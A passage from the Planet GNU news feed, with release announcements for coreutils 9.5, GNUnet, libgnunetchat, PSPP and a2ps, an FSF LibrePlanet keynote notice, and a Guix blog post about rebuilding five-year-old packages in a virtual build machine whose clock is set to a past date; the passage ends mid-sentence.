Planet GNU
https://planet.gnu.org/
Planet GNU - https://planet.gnu.org/coreutils @ Savannah: coreutils-9.5 released [stable]
https://savannah.gnu.org/news/?id=10612
<p><br />
</p>
<blockquote class="verbatim"><p> This is to announce coreutils-9.5, a stable release.<br />
See the NEWS below for a summary of changes.<br />
<br />
There have been 187 commits by 18 people in the 30 weeks since 9.4.<br />
Thanks to everyone who has contributed!<br />
The following people contributed changes to this release:<br />
<br />
Aearil (1) Petr Malat (1)<br />
Bruno Haible (3) Pádraig Brady (75)<br />
Christian Göttsche (1) Samuel Tardieu (1)<br />
Collin Funk (4) Stephane Chazelas (1)<br />
Daan De Meyer (1) Stephen Kitt (1)<br />
Greg Wooledge (1) Sylvestre Ledru (3)<br />
Grisha Levit (2) Ville Skyttä (1)<br />
Michel Lind (1) dann frazier (1)<br />
Paul Eggert (89) lvgenggeng (1)<br />
<br />
Pádraig [on behalf of the coreutils maintainers]<br />
==================================================================<br />
<br />
Here is the GNU coreutils home page:<br />
https://gnu.org/s/coreutils/<br />
<br />
For a summary of changes and contributors, see:<br />
https://git.sv.gnu.org/gitweb/?p=coreutils.git;a=shortlog;h=v9.5<br />
or run this command from a git-cloned coreutils directory:<br />
git shortlog v9.4..v9.5<br />
<br />
Here are the compressed sources:<br />
https://ftp.gnu.org/gnu/coreutils/coreutils-9.5.tar.gz (15MB)<br />
https://ftp.gnu.org/gnu/coreutils/coreutils-9.5.tar.xz (5.8MB)<br />
<br />
Here are the GPG detached signatures:<br />
https://ftp.gnu.org/gnu/coreutils/coreutils-9.5.tar.gz.sig<br />
https://ftp.gnu.org/gnu/coreutils/coreutils-9.5.tar.xz.sig<br />
<br />
Use a mirror for higher download bandwidth:<br />
https://www.gnu.org/order/ftp.html<br />
<br />
Here are the SHA1 and SHA256 checksums:<br />
<br />
3285114d93b39e5e4643b0846f570203a5e4c97b coreutils-9.5.tar.gz<br />
dnrmoilQ7ELzul98Heed0ngA7o6bhkLaXe21l0oXQeU= coreutils-9.5.tar.gz<br />
867fed7ce2ee15c5150a355a5f3a3b50578cf78d coreutils-9.5.tar.xz<br />
zTKO3qyS9qZl3p8yPJO3Eq8YWLwuDYjz9xAEaUcKG4o= coreutils-9.5.tar.xz<br />
<br />
Verify the base64 SHA256 checksum with cksum -a sha256 --check<br />
from coreutils-9.2 or OpenBSD's cksum since 2007.<br />
<br />
Use a .sig file to verify that the corresponding file (without the<br />
.sig suffix) is intact. First, be sure to download both the .sig file<br />
and the corresponding tarball. Then, run a command like this:<br />
<br />
gpg --verify coreutils-9.5.tar.gz.sig<br />
<br />
The signature should match the fingerprint of the following key:<br />
<br />
pub rsa4096/0xDF6FD971306037D9 2011-09-23 [SC]<br />
Key fingerprint = 6C37 DC12 121A 5006 BC1D B804 DF6F D971 3060 37D9<br />
uid [ultimate] Pádraig Brady <P@draigBrady.com><br />
uid [ultimate] Pádraig Brady <pixelbeat@gnu.org><br />
<br />
If that command fails because you don't have the required public key,<br />
or that public key has expired, try the following commands to retrieve<br />
or refresh it, and then rerun the 'gpg --verify' command.<br />
<br />
gpg --locate-external-key P@draigBrady.com<br />
<br />
gpg --recv-keys DF6FD971306037D9<br />
<br />
wget -q -O- 'https://savannah.gnu.org/project/release-gpgkeys.php?group=coreutils&download=1' | gpg --import -<br />
<br />
As a last resort to find the key, you can try the official GNU<br />
keyring:<br />
<br />
wget -q https://ftp.gnu.org/gnu/gnu-keyring.gpg<br />
gpg --keyring gnu-keyring.gpg --verify coreutils-9.5.tar.gz.sig<br />
<br />
This release was bootstrapped with the following tools:<br />
Autoconf 2.72c.32-cb6fb<br />
Automake 1.16.5<br />
Gnulib v0.1-7293-g259829e78b<br />
Bison 3.8.2<br />
<br />
NEWS<br />
<br />
* Noteworthy changes in release 9.5 (2024-03-28) [stable]<br />
<br />
** Bug fixes<br />
<br />
chmod -R now avoids a race where an attacker may replace a traversed file<br />
with a symlink, causing chmod to operate on an unintended file.<br />
[This bug was present in "the beginning".]<br />
<br />
cp, mv, and install no longer issue spurious diagnostics like "failed<br />
to preserve ownership" when copying to GNU/Linux CIFS file systems.<br />
They do this by working around some Linux CIFS bugs.<br />
<br />
cp --no-preserve=mode will correctly maintain set-group-ID bits<br />
for created directories. Previously on systems that didn't support ACLs,<br />
cp would have reset the set-group-ID bit on created directories.<br />
[bug introduced in coreutils-8.20]<br />
<br />
join and uniq now support multi-byte characters better.<br />
For example, 'join -tX' now works even if X is a multi-byte character,<br />
and both programs now treat multi-byte characters like U+3000<br />
IDEOGRAPHIC SPACE as blanks if the current locale treats them so.<br />
<br />
numfmt options like --suffix no longer have an arbitrary 127-byte limit.<br />
[bug introduced with numfmt in coreutils-8.21]<br />
<br />
mktemp with --suffix now better diagnoses templates with too few X's.<br />
Previously it conflated the insignificant --suffix in the error.<br />
[bug introduced in coreutils-8.1]<br />
<br />
sort again handles thousands grouping characters in single-byte locales<br />
where the grouping character is greater than CHAR_MAX. For e.g. signed<br />
character platforms with a 0xA0 (aka &nbsp) grouping character.<br />
[bug introduced in coreutils-9.1]<br />
<br />
split --line-bytes with a mixture of very long and short lines<br />
no longer overwrites the heap (CVE-2024-0684).<br />
[bug introduced in coreutils-9.2]<br />
<br />
tail no longer mishandles input from files in /proc and /sys file systems,<br />
on systems with a page size larger than the stdio BUFSIZ.<br />
[This bug was present in "the beginning".]<br />
<br />
timeout avoids a narrow race condition, where it might kill arbitrary<br />
processes after a failed process fork.<br />
[bug introduced with timeout in coreutils-7.0]<br />
<br />
timeout avoids a narrow race condition, where it might fail to<br />
kill monitored processes immediately after forking them.<br />
[bug introduced with timeout in coreutils-7.0]<br />
<br />
wc no longer fails to count unprintable characters as parts of words.<br />
[bug introduced in textutils-2.1]<br />
<br />
** Changes in behavior<br />
<br />
base32 and base64 no longer require padding when decoding.<br />
Previously an error was given for non padded encoded data.<br />
<br />
base32 and base64 have improved detection of corrupted encodings.<br />
Previously encodings with non zero padding bits were accepted.<br />
<br />
basenc --base16 -d now supports lower case hexadecimal characters.<br />
Previously an error was given for lower case hex digits.<br />
<br />
cp --no-clobber, and mv -n no longer exit with failure status if<br />
existing files are encountered in the destination. Instead they revert<br />
to the behavior from before v9.2, silently skipping existing files.<br />
<br />
ls --dired now implies long format output without hyperlinks enabled,<br />
and will take precedence over previously specified formats or hyperlink mode.<br />
<br />
numfmt will accept lowercase 'k' to indicate Kilo or Kibi units on input,<br />
and uses lowercase 'k' when outputting such units in '--to=si' mode.<br />
<br />
pinky no longer tries to canonicalize the user's login location by default,<br />
rather requiring the new --lookup option to enable this often slow feature.<br />
<br />
wc no longer ignores encoding errors when counting words.<br />
Instead, it treats them as non white space.<br />
<br />
** New features<br />
<br />
chgrp now accepts the --from=OWNER:GROUP option to restrict changes to files<br />
with matching current OWNER and/or GROUP, as already supported by chown(1).<br />
<br />
chmod adds support for -h, -H,-L,-P, and --dereference options, providing<br />
more control over symlink handling. This supports more secure handling of<br />
CLI arguments, and is more consistent with chown, and chmod on other systems.<br />
<br />
cp now accepts the --keep-directory-symlink option (like tar), to preserve<br />
and follow existing symlinks to directories in the destination.<br />
<br />
cp and mv now accept the --update=none-fail option, which is similar<br />
to the --no-clobber option, except that existing files are diagnosed,<br />
and the command exits with failure status if existing files.<br />
The -n,--no-clobber option is best avoided due to platform differences.<br />
<br />
env now accepts the -a,--argv0 option to override the zeroth argument<br />
of the command being executed.<br />
<br />
mv now accepts an --exchange option, which causes the source and<br />
destination to be exchanged. It should be combined with<br />
--no-target-directory (-T) if the destination is a directory.<br />
The exchange is atomic if source and destination are on a single<br />
file system that supports atomic exchange; --exchange is not yet<br />
supported in other situations.<br />
<br />
od now supports printing IEEE half precision floating point with -t fH,<br />
or brain 16 bit floating point with -t fB, where supported by the compiler.<br />
<br />
tail now supports following multiple processes, with repeated --pid options.<br />
<br />
** Improvements<br />
<br />
cp,mv,install,cat,split now read and write a minimum of 256KiB at a time.<br />
This was previously 128KiB and increasing to 256KiB was seen to increase<br />
throughput by 10-20% when reading cached files on modern systems.<br />
<br />
env,kill,timeout now support unnamed signals. kill(1) for example now<br />
supports sending such signals, and env(1) will list them appropriately.<br />
<br />
SELinux operations in file copy operations are now more efficient,<br />
avoiding unneeded MCS/MLS label translation.<br />
<br />
sort no longer dynamically links to libcrypto unless -R is used.<br />
This decreases startup overhead in the typical case.<br />
<br />
wc is now much faster in single-byte locales and somewhat faster in<br />
multi-byte locales.<br />
</p></blockquote>
<p><br />
</p>2024-03-28T15:39:50+00:00Pádraig BradyFSF News: Alyssa Rosenzweig, who spearheaded the reverse-engineering of Apple's GPU, to keynote LibrePlanet
http://www.fsf.org/news/alyssa-rosenzweig-who-spearheaded-the-reverse-engineering-of-apples-gpu-to-keynote-libreplanet
BOSTON, Massachusetts, USA -- March 27, 2024 -- The Free Software Foundation (FSF) today announced Alyssa Rosenzweig, who reverse-engineered Apple's current line of graphics processing units (GPU), as keynote speaker for LibrePlanet 2024. LibrePlanet 2024: Cultivating Community is the sixteenth edition of the FSF's conference on ethical technology and user freedom and will be held on May 4 and 5 at the Wentworth Institute of Technology in Boston, MA, as well as online.2024-03-27T16:50:00+00:00FSF NewsGNUnet News: libgnunetchat 0.3.1
https://gnunet.org/en/news/2024-03-libgnunetchat-0.3.1.html
<article id="newspost-content">
<h1>
libgnunetchat 0.3.1 released
</h1>
<p>
This is mostly a bugfix release for libgnunetchat 0.3.0 to reduce build issues.
</p>
<h4>
Download links
</h4>
<ul>
<li>
<a href="http://ftpmirror.gnu.org/gnunet/libgnunetchat-0.3.1.tar.gz">
libgnunetchat-0.3.1.tar.gz
</a>
</li>
<li>
<a href="http://ftpmirror.gnu.org/gnunet/libgnunetchat-0.3.1.tar.gz.sig">
libgnunetchat-0.3.1.tar.gz.sig
</a>
</li>
</ul>
<p>
The GPG key used to sign is:
<a href="https://gnunet.org/~schanzen/3D11063C10F98D14BD24D1470B0998EF86F59B6A">
3D11063C10F98D14BD24D1470B0998EF86F59B6A
</a>
</p>
<p>
Note that due to mirror synchronization, not all links may be functional
early after the release. For direct access try
<a href="http://ftp.gnu.org/gnu/gnunet/">
http://ftp.gnu.org/gnu/gnunet/
</a>
</p>
</article>2024-03-22T23:00:00+00:00GNUnet Newspspp @ Savannah: PSPP 2.0.1 has been released
https://savannah.gnu.org/news/?id=10610
<p>I'm very pleased to announce the release of a new version of GNU PSPP. PSPP is a program for statistical analysis of sampled data. It is a free replacement for the proprietary program SPSS.
<br />
<br />
Changes from 2.0.0 to 2.0.1:
<br />
</p>
<ul>
<li>Bug fixes.
</li>
<li>Translation updates.
</li>
</ul>
<p>Please send PSPP bug reports to bug-gnu-pspp@gnu.org.<br />
</p>2024-03-21T23:42:20+00:00Ben PfaffGNUnet News: GNUnet 0.21.1
https://gnunet.org/en/news/2024-03-0.21.1.html
<article id="newspost-content">
<h1>
GNUnet 0.21.1
</h1>
<p>
This is a bugfix release for gnunet 0.21.0.
It primarily addresses some connectivity issues introduced with our new transport subsystem.
</p>
<p>
</p>
<h4>
Links
</h4>
<ul>
<li>
Source:
<a href="https://ftpmirror.gnu.org/gnunet/gnunet-0.21.1.tar.gz">
https://ftpmirror.gnu.org/gnunet/gnunet-0.21.1.tar.gz
</a>
(
<a href="https://ftpmirror.gnu.org/gnunet/gnunet-0.21.1.tar.gz.sig">
https://ftpmirror.gnu.org/gnunet/gnunet-0.21.1.tar.gz.sig
</a>
)
</li>
<li>
Source (meson):
<a href="https://buildbot.gnunet.org/releases/gnunet-0.21.1-meson.tar.gz">
https://buildbot.gnunet.org/gnunet-0.21.1-meson.tar.gz
</a>
(
<a href="https://buildbot.gnunet.org/gnunet-0.21.1-meson.tar.gz.sig">
https://buildbot.gnunet.org/gnunet-0.21.1-meson.tar.gz.sig
</a>
)
</li>
<li>
Detailed list of changes:
<a href="https://git.gnunet.org/gnunet.git/log/?h=v0.21.1">
https://git.gnunet.org/gnunet.git/log/?h=v0.21.1
</a>
</li>
<li>
NEWS:
<a href="https://git.gnunet.org/gnunet.git/tree/NEWS?h=v0.21.1">
https://git.gnunet.org/gnunet.git/tree/NEWS?h=v0.21.1
</a>
</li>
<li>
The list of closed issues in the bug tracker:
<a href="https://bugs.gnunet.org/changelog_page.php?version_id=437">
https://bugs.gnunet.org/changelog_page.php?version_id=437
</a>
</li>
</ul>
<p>
The GPG key used to sign is:
<a href="https://gnunet.org/~schanzen/3D11063C10F98D14BD24D1470B0998EF86F59B6A">
3D11063C10F98D14BD24D1470B0998EF86F59B6A
</a>
</p>
<p>
Note that due to mirror synchronization, not all links may be functional
early after the release. For direct access try
<a href="https://ftp.gnu.org/gnu/gnunet/">
https://ftp.gnu.org/gnu/gnunet/
</a>
</p>
</article>2024-03-14T23:00:00+00:00GNUnet Newsa2ps @ Savannah: a2ps 4.15.6 released [stable]
https://savannah.gnu.org/news/?id=10609
<p><br />
</p>
<blockquote class="verbatim"><p> I am delighted to announce version 4.15.6 of GNU a2ps, the Anything to<br />
PostScript converter.<br />
<br />
This release fixes a couple of bugs, in particular with printing (the -P<br />
flag). See below for details.<br />
<br />
<br />
Here are the compressed sources and a GPG detached signature:<br />
https://ftpmirror.gnu.org/a2ps/a2ps-4.15.6.tar.gz<br />
https://ftpmirror.gnu.org/a2ps/a2ps-4.15.6.tar.gz.sig<br />
<br />
Use a mirror for higher download bandwidth:<br />
https://www.gnu.org/order/ftp.html<br />
<br />
Here are the SHA1 and SHA256 checksums:<br />
<br />
e20e8009d8812c8d960884b79aab95f235c725c0 a2ps-4.15.6.tar.gz<br />
h/+dgByxGWkYHVuM+LZeZeWyS7DHahuCXoCY8pBvvfQ a2ps-4.15.6.tar.gz<br />
<br />
The SHA256 checksum is base64 encoded, instead of the<br />
hexadecimal encoding that most checksum tools default to.<br />
<br />
Use a .sig file to verify that the corresponding file (without the<br />
.sig suffix) is intact. First, be sure to download both the .sig file<br />
and the corresponding tarball. Then, run a command like this:<br />
<br />
gpg --verify a2ps-4.15.6.tar.gz.sig<br />
<br />
The signature should match the fingerprint of the following key:<br />
<br />
pub rsa2048 2013-12-11 [SC]<br />
2409 3F01 6FFE 8602 EF44 9BB8 4C8E F3DA 3FD3 7230<br />
uid Reuben Thomas <rrt@sc3d.org><br />
uid keybase.io/rrt <rrt@keybase.io><br />
<br />
If that command fails because you don't have the required public key,<br />
or that public key has expired, try the following commands to retrieve<br />
or refresh it, and then rerun the 'gpg --verify' command.<br />
<br />
gpg --locate-external-key rrt@sc3d.org<br />
<br />
gpg --recv-keys 4C8EF3DA3FD37230<br />
<br />
wget -q -O- 'https://savannah.gnu.org/project/release-gpgkeys.php?group=a2ps&download=1' | gpg --import -<br />
<br />
As a last resort to find the key, you can try the official GNU<br />
keyring:<br />
<br />
wget -q https://ftp.gnu.org/gnu/gnu-keyring.gpg<br />
gpg --keyring gnu-keyring.gpg --verify a2ps-4.15.6.tar.gz.sig<br />
<br />
<br />
This release was bootstrapped with the following tools:<br />
Autoconf 2.71<br />
Automake 1.16.5<br />
Gnulib v0.1-7186-g5aa8eafc0e<br />
<br />
NEWS<br />
<br />
* Noteworthy changes in release 4.15.6 (2024-03-13) [stable]<br />
* Bug fixes:<br />
- Fix a2ps-lpr-wrapper to work with no arguments, as a2ps requires.<br />
- Minor fixes & improvements to sheets.map for image types and PDF.<br />
* Build system:<br />
- Minor fixes and improvements.<br />
</p></blockquote>
<p><br />
</p>2024-03-13T18:24:17+00:00Reuben ThomasGNU Guix: Adventures on the quest for long-term reproducible deployment
https://guix.gnu.org/blog/2024/adventures-on-the-quest-for-long-term-reproducible-deployment//
<p>Rebuilding software five years later, how hard can it be? It can’t be
<em>that</em> hard, especially when you pride yourself on having a tool that
can <a href="https://guix.gnu.org/manual/devel/en/html_node/Invoking-guix-time_002dmachine.html">travel in
time</a>
and that does a good job at ensuring <a href="https://reproducible-builds.org/docs/definition/">reproducible
builds</a>, right?</p><p>In hindsight, we can tell you: it’s more challenging than it
seems. Users attempting to travel 5 years back with <code>guix time-machine</code>
are (or <em>were</em>) unavoidably going to hit bumps on the road—a real
problem because that’s one of the use cases Guix aims to support well,
in particular in a <a href="https://hpc.guix.info/blog/tag/reproducibility/">reproducible
research</a> context.</p><p>In this post, we look at some of the challenges we face while traveling
back, how we are overcoming them, and open issues.</p><h1>The vision</h1><p>First of all, one clarification: Guix aims to support time travel, but
we’re talking of a time scale measured in years, not in decades. We
know all too well that this is already very ambitious—it’s something
that probably nobody except <a href="https://nixos.org">Nix</a> and Guix are even
trying. More importantly, software deployment at the scale of decades
calls for very different, more radical techniques; it’s the work of
archivists.</p><p>Concretely, Guix 1.0.0 was <a href="https://guix.gnu.org/en/blog/2019/gnu-guix-1.0.0-released/">released in
2019</a> and
our goal is to allow users to travel as far back as 1.0.0 and redeploy
software from there, as in this example:</p><pre><code>$ guix time-machine -q --commit=v1.0.0 -- \
environment --ad-hoc python2 -- python
> guile: warning: failed to install locale
Python 2.7.15 (default, Jan 1 1970, 00:00:01)
[GCC 5.5.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>></code></pre><p>(The command above uses <code>guix environment</code>, the <a href="https://guix.gnu.org/en/blog/2021/from-guix-environment-to-guix-shell/">predecessor of <code>guix shell</code></a>,
which didn’t exist back then.)
It’s only 5 years ago but it’s pretty much remote history on the scale
of software evolution—in this case, that history comprises major
changes <a href="https://guix.gnu.org/en/blog/2021/the-big-change/">in Guix
itself</a> and
<a href="https://guix.gnu.org/en/blog/2020/guile-3-and-guix/">in Guile</a>.
How well does such a command work? Well, it depends.</p><p>The project has two build farms; <code>bordeaux.guix.gnu.org</code> has been
keeping substitutes (pre-built binaries) of everything it built since
roughly 2021, while <code>ci.guix.gnu.org</code> keeps substitutes for roughly two
years, but there is currently no guarantee on the duration
substitutes may be retained.
Time traveling to a period where substitutes are available is
fine: you end up downloading lots of binaries, but that’s OK, you rather
quickly have your software environment at hand.</p><h1>Bumps on the build road</h1><p>Things get more complicated when targeting a period in time for which
substitutes are no longer available, as was the case for <code>v1.0.0</code> above.
(And really, we should assume that substitutes won’t remain available
forever: fellow NixOS hackers recently had to seriously consider
<a href="https://discourse.nixos.org/t/nixos-s3-long-term-resolution-phase-1/36493">trimming their 20-year-long history of
substitutes</a>
because the costs are not sustainable.)</p><p>Apart from the long build times, the first problem that arises in the
absence of substitutes is source code unavailability. I’ll spare you
the details for this post—that problem alone would deserve a book.
Suffice to say that we’re lucky that we started working on <a href="https://guix.gnu.org/en/blog/2019/connecting-reproducible-deployment-to-a-long-term-source-code-archive/">integrating
Guix with Software
Heritage</a>
years ago, and that there has been great progress over the last couple
of years to get closer to <a href="https://ngyro.com/pog-reports/latest/">full package source code
archival</a> (more precisely: 94% of
the source code of packages available in Guix in January 2024 is
archived, versus 72% of the packages available in May 2019).</p><p>So what happens when you run the <code>time-machine</code> command above? It
brings you to May 2019, a time for which none of the official build
farms had substitutes until a few days ago. Ideally, thanks to
<a href="https://guix.gnu.org/manual/devel/en/html_node/Build-Environment-Setup.html">isolated build
environments</a>,
you’d build things for hours or days, and in the end all those binaries
will be here just as they were 5 years ago. In practice though, there
are several problems that isolation as currently implemented does <em>not</em>
address.</p><p><img alt="Screenshot of movie “Safety Last!” with Harold Lloyd hanging from a clock on a building’s façade." src="https://guix.gnu.org/static/blog/img/safety-last.jpg" /></p><p>Among those, the most frequent problem is <em>time traps</em>: software build
processes that fail after a certain date (these are also referred to as
“time bombs” but we’ve had enough of these and would rather call for a
ceasefire). This plagues a handful of packages out of almost 30,000 but
unfortunately we’re talking about packages deep in the dependency graph.
Here are some examples:</p><ul><li><a href="https://issues.guix.gnu.org/56137">OpenSSL</a> unit tests fail
after a certain date because some of the X.509 certificates they use
have expired.</li><li><a href="https://issues.guix.gnu.org/44559">GnuTLS</a> had similar issues;
newer versions rely on
<a href="https://packages.guix.gnu.org/packages/datefudge/">datefudge</a> to
fake the date while running the tests and thus avoid that problem
altogether.</li><li>Python 2.7, found in Guix 1.0.0, also <a href="https://issues.guix.gnu.org/65378">had that
problem</a> with its TLS-related
tests.</li><li>OpenJDK <a href="https://issues.guix.gnu.org/68333">would fail to build at some
point</a> with this interesting
message: <code>Error: time is more than 10 years from present: 1388527200000</code> (the build system would consider that its data about
currencies is likely outdated after 10 years).</li><li>Libgit2, a dependency of Guix, had (has?) a <a href="https://issues.guix.gnu.org/55326">time-dependent
tests</a>.</li><li>MariaDB tests <a href="https://issues.guix.gnu.org/34351">started failing in
2019</a>.</li></ul><p>Someone traveling to <code>v1.0.0</code> will hit several of these, preventing
<code>guix time-machine</code> from completing. A serious bummer, especially to
those who’ve come to Guix from the perspective of making their <a href="https://hpc.guix.info/blog/2023/06/a-guide-to-reproducible-research-papers/">research
workflow
reproducible</a>.</p><p>Time traps are the main road block, but there’s more! In rare cases,
there’s software influenced by kernel details not controlled by the
build daemon:</p><ul><li>Tests of the hwloc hardware locality library <a href="https://issues.guix.gnu.org/54767">would fail when
running on a Btrfs file system</a>.</li></ul><p>In a handful of cases, but important ones, builds might fail when
performed on certain CPUs. We’re aware of at least two cases:</p><ul><li>Python 3.9 to 3.11 would set a signal handler stack <a href="https://github.com/python/cpython/issues/91124">too small for
use on Intel Sapphire Rapids Xeon
CPUs</a> (it’s more
complicated than this but the end result is: it will no longer build
on modern hardware).</li><li>Firefox would reportedly <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1882015">crash on Raptor Lake CPUs running an buggy
version of their
firmware</a>.</li></ul><p>Neither time traps nor those obscure hardware-related issues can be
avoided with the isolation mechanism currently used by the build daemon.
This harms time traveling when substitutes are unavailable. Giving up
is not in the ethos of this project though.</p><h1>Where to go from here?</h1><p>There are really two open questions here:</p><ol><li>How can we tell which packages needs to be “fixed”, and how:
building at a specific date, on a specific CPU?</li><li>How can keep those aspects of the build environment (time, CPU
variant) under control?</li></ol><p>Let’s start with #2. Before looking for a solution, it’s worth
remembering where we come from. The build daemon runs build processes
with a <a href="https://www.man7.org/linux/man-pages/man2/chroot.2.html">separate root file
system</a>, under
dedicated user IDs, and in separate <a href="https://www.man7.org/linux/man-pages/man7/namespaces.7.html">Linux
namespaces</a>,
thereby minimizing interference with the rest of the system and ensuring
a <a href="https://guix.gnu.org/manual/devel/en/html_node/Build-Environment-Setup.html">well-defined build
environment</a>.
This technique was
<a href="https://archive.softwareheritage.org/browse/revision/9397cd30c8a6ffd65fc3b85985ea59ecfb72672b/">implemented</a>
by Eelco Dolstra for Nix in 2007 (with namespace support <a href="https://archive.softwareheritage.org/browse/revision/df716c98d203ab64cdf05f9c17fdae565b7daa1c/">added
in
2012</a>),
at a time where the word <em>container</em> had to do with boats and before
“Docker” became the name of a software tool. In short, the approach
consists in <em>controlling the build environment</em> in every detail (it’s at
odds with the strategy that consists in achieving reproducible builds
<a href="https://tests.reproducible-builds.org/debian/index_variations.html"><em>in spite</em> of high build environment
variability</a>).
That these are mere processes with a bunch of bind mounts makes this
approach inexpensive and appealing.</p><p>Realizing we’d also want to control the build environment’s date,
we naturally turn to Linux namespaces to address that—Dolstra, Löh, and
Pierron already suggested something along these lines in the conclusion
of their <a href="https://edolstra.github.io/pubs/nixos-jfp-final.pdf">2010 <em>Journal of Functional Programming</em>
paper</a>. Turns out
there <em>is</em> now a <a href="https://www.man7.org/linux/man-pages/man7/time_namespaces.7.html">time
namespace</a>.
Unfortunately it’s limited to <code>CLOCK_MONOTONIC</code> and <code>CLOCK_BOOTTIME</code>
clocks; the manual page states:</p><blockquote><p>Note that time namespaces do not virtualize the <code>CLOCK_REALTIME</code>
clock. Virtualization of this clock was avoided for reasons of
complexity and overhead within the kernel.</p></blockquote><p>I hear you say: <em>What about
<a href="https://packages.guix.gnu.org/packages/datefudge/">datefudge</a> and
<a href="https://packages.guix.gnu.org/packages/libfaketime/">libfaketime</a>?</em>
These rely on the <code>LD_PRELOAD</code> environment variable to trick the dynamic
linker into pre-loading a library that provides symbols such as
<code>gettimeofday</code> and <code>clock_gettime</code>. This is a fine approach in some
cases, but it’s too fragile and too intrusive when targeting arbitrary
build processes.</p><p>That leaves us with essentially one viable option: virtual machines
(VMs). The full-system QEMU lets you specify the initial real-time
clock of the VM with the <code>-rtc</code> flag, which is exactly what we need
(“user-land” QEMU such as <code>qemu-x86_64</code> does not support it). And of
course, it lets you specify the CPU model to emulate.</p><h1>News from the past</h1><p>Now, the question is: where does the VM fit? The author considered
writing a <a href="https://guix.gnu.org/manual/devel/en/html_node/Package-Transformation-Options.html">package
transformation</a>
that would change a package such that it’s built in a well-defined VM.
However, that wouldn’t really help: this option didn’t exist in past
revisions, and it would lead to a different build anyway from the
perspective of the daemon—a different
<a href="https://guix.gnu.org/manual/devel/en/html_node/Derivations.html"><em>derivation</em></a>.</p><p>The best strategy appeared to be
<a href="https://guix.gnu.org/manual/devel/en/html_node/Daemon-Offload-Setup.html"><em>offloading</em></a>:
the build daemon can offload builds to different machines over SSH, we
just need to let it send builds to a suitably-configured VM. To do
that, we can reuse some of the machinery initially developed for
<a href="https://guix.gnu.org/manual/devel/en/html_node/Virtualization-Services.html#index-childhurd_002c-offloading"><em>childhurds</em></a>
that takes care of setting up offloading to the VM: creating substitute
signing keys and SSH keys, exchanging secret key material between the
host and the guest, and so on.</p><p>The end result is a <a href="https://guix.gnu.org/manual/devel/en/html_node/Virtualization-Services.html#Virtual-Build-Machines">service for Guix System
users</a>
that can be configured in a few lines:</p><pre><code class="language-scheme">(use-modules (gnu services virtualization))
(operating-system
;; …
(services (append (list (service virtual-build-machine-service-type))
%base-services)))</code></pre><p>The default setting above provides a 4-core VM whose initial date is
January 2020, emulating a Skylake CPU from that time—the right setup for
someone willing to reproduce old binaries. You can check the
configuration like this:</p><pre><code>$ sudo herd configuration build-vm
CPU: Skylake-Client
number of CPU cores: 4
memory size: 2048 MiB
initial date: Wed Jan 01 00:00:00Z 2020</code></pre><p>To enable offloading to that VM, one has to explicitly start it, like
so:</p><pre><code>$ sudo herd start build-vm</code></pre><p>From there on, every native build is offloaded to the VM. The key part
is that with almost no configuration, you get everything set up to build
packages “in the past”. It’s a Guix System only solution; if you run
Guix on another distro, you can set up a similar build VM but you’ll
have to go through the cumbersome process that is all taken care of
automatically here.</p><p>Of course it’s possible to choose different configuration parameters:</p><pre><code class="language-scheme">(service virtual-build-machine-service-type
(virtual-build-machine
(date (make-date 0 0 00 00 01 10 2017 0)) ;further back in time
(cpu "Westmere")
(cpu-count 16)
(memory-size (* 8 1024))
(auto-start? #t)))</code></pre><p>With a build VM with its date set to January 2020, we have been able to
rebuild Guix and its dependencies along with a bunch of packages such as
<code>emacs-minimal</code> from <code>v1.0.0</code>, overcoming all the time traps and other
challenges described earlier. As a side effect, substitutes
are now available from <code>ci.guix.gnu.org</code> so you can even try this at
home without having to rebuild the world:</p><pre><code>$ guix time-machine -q --commit=v1.0.0 -- build emacs-minimal --dry-run
guile: warning: failed to install locale
substitute: updating substitutes from 'https://ci.guix.gnu.org'... 100.0%
38.5 MB would be downloaded:
/gnu/store/53dnj0gmy5qxa4cbqpzq0fl2gcg55jpk-emacs-minimal-26.2</code></pre><p>For the fun of it, we went as far as <code>v0.16.0</code>, <a href="https://guix.gnu.org/blog/2018/gnu-guix-and-guixsd-0.16.0-released/">released in December
2018</a>:</p><pre><code>guix time-machine -q --commit=v0.16.0 -- \
environment --ad-hoc vim -- vim --version</code></pre><p>This is the furthest we can go since
<a href="https://guix.gnu.org/manual/devel/en/html_node/Channels.html">channels</a>
and the underlying mechanisms that make time travel possible did not
exist before that date.</p><p>There’s one “interesting” case we stumbled upon in that process: in
OpenSSL 1.1.1g (released April 2020 and packaged <a href="https://archive.softwareheritage.org/browse/revision/c4868e38289baf3a9a74bdf32166d321f7365725/">in December
2020</a>),
some of the test certificates are not valid <em>before</em> April 2020, so the
build VM needs to have its clock set to May 2020 or thereabouts.
Booting the build VM with a different date can be done without
reconfiguring the system:</p><pre><code>$ sudo herd stop build-vm
$ sudo herd start build-vm -- -rtc base=2020-05-01T00:00:00</code></pre><p>The <code>-rtc …</code> flags are passed straight to QEMU, which is handy when
exploring workarounds…</p><p>The <a href="https://ci.guix.gnu.org/jobset/time-travel"><code>time-travel</code> continuous integration
jobset</a> has been set up to
check that we can, at any time, travel back to one of the past releases.
This at least ensures that Guix itself and its dependencies have
substitutes available at <code>ci.guix.gnu.org</code>.</p><h1>Reproducible research workflows reproduced</h1><p>Incidentally, this effort rebuilding 5-year-old packages has allowed us
to fix embarrassing problems. Software that accompanies research papers
that followed our <a href="https://hpc.guix.info/blog/2023/06/a-guide-to-reproducible-research-papers/">reproducibility
guidelines</a>
could no longer be deployed, at least not without this clock twiddling
effort:</p><ul><li><a href="https://archive.softwareheritage.org/browse/origin/directory/?origin_url=https://gitlab.inria.fr/lcourtes-phd/edcc-2006-redone">code</a>
of <a href="https://doi.org/10.5281/zenodo.3886739"><em>[Re] Storage Tradeoffs in a Collaborative Backup Service for
Mobile Devices</em></a>, submitted
as part of the ReScience <a href="https://rescience.github.io/ten-years/"><em>Ten Years Reproducibility
Challenge</em></a> in June 2020,
and which is precisely about showcasing reproducible deployment with
Guix;</li><li><a href="https://archive.softwareheritage.org/browse/revision/707f00afef8f6ef1f29a7a4c961dd714f82833f5/">code</a>
of the 2022 Nature Scientific Data article entitled <a href="https://doi.org/10.1038/s41597-022-01720-9"><em>Toward
practical transparent verifiable and long-term reproducible research
using Guix</em></a>, which
relied on an April 2020 revision of Guix to deploy (Simon Tournier
who co-authored the paper <a href="https://simon.tournier.info/posts/2023-12-21-repro-paper.html">reported
earlier</a>
on a failed attempt showing just how challenging it was).</li></ul><p>It’s good news that we can now re-deploy these 5-year-old software
environments with minimum hassle; it’s bad news that holding this
promise took extra effort.</p><p>The ability to reproduce the environment of software that accompanies
